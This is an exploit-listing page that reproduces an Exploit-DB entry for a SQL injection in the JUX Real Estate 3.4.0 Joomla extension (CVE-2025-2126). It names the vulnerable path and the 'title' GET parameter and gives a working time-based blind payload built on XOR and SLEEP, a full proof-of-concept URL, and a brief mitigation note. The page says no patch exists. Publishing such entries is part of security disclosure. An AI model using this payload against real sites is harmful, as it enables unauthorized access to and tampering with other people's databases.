header-logo
Suggest Exploit
vendor:
JUX Real Estate
by:
CraCkEr
6.1
CVSS
HIGH
SQL Injection
89 - 74 - 707
CWE
Product Name: JUX Real Estate
Affected Version From: 3.4.2000
Affected Version To: 3.4.2000
Patch Exists: NO
Related CWE: CVE-2025-2126
CPE: a:joomlaux:jux_real_estate:3.4.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 11 Pro
2025

JUX Real Estate 3.4.0 – SQL Injection

SQL injection vulnerability in JUX Real Estate 3.4.0 allows attackers to access sensitive data, modify data, and potentially disrupt the application, resulting in financial losses and reputational damage to the organization.

Mitigation:

To mitigate this vulnerability, input validation should be implemented to sanitize user-supplied data and the use of parameterized queries or prepared statements should be enforced.
Source

Exploit-DB raw data:

# Exploit Title: JUX Real Estate 3.4.0 - SQL Injection
# Exploit Author: CraCkEr
# Date: 26/02/2025
# Vendor: JoomlaUX
# Vendor Homepage: https://joomlaux.com/
# Software Link: https://extensions.joomla.org/extension/jux-real-estate/
# Demo Link: http://demo.joomlaux.com/#jux-real-estate
# Tested on: Windows 11 Pro
# Impact: Database Access
# CWE: CWE-89 - CWE-74 - CWE-707
# CVE: CVE-2025-2126
# VDB: VDB-299039


## Description

SQL injection attacks can allow unauthorized access to sensitive data, modification of
data and crash the application or make it unavailable, leading to lost revenue and
damage to a company's reputation.


Path: /extensions/realestate/index.php/properties/list/list-with-sidebar/realties

GET Parameter 'title' is vulnerable to SQLi


---
Parameter: title (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: option=com_jux_real_estate&view=realties&Itemid=148&title='XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search


## POC:

https://website/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=[SQLi]

## Payload:

1'XOR(SELECT(0)FROM(SELECT(SLEEP(6)))a)XOR'Z



[-] Done

Navigation

Suggest Exploit

Services By CQR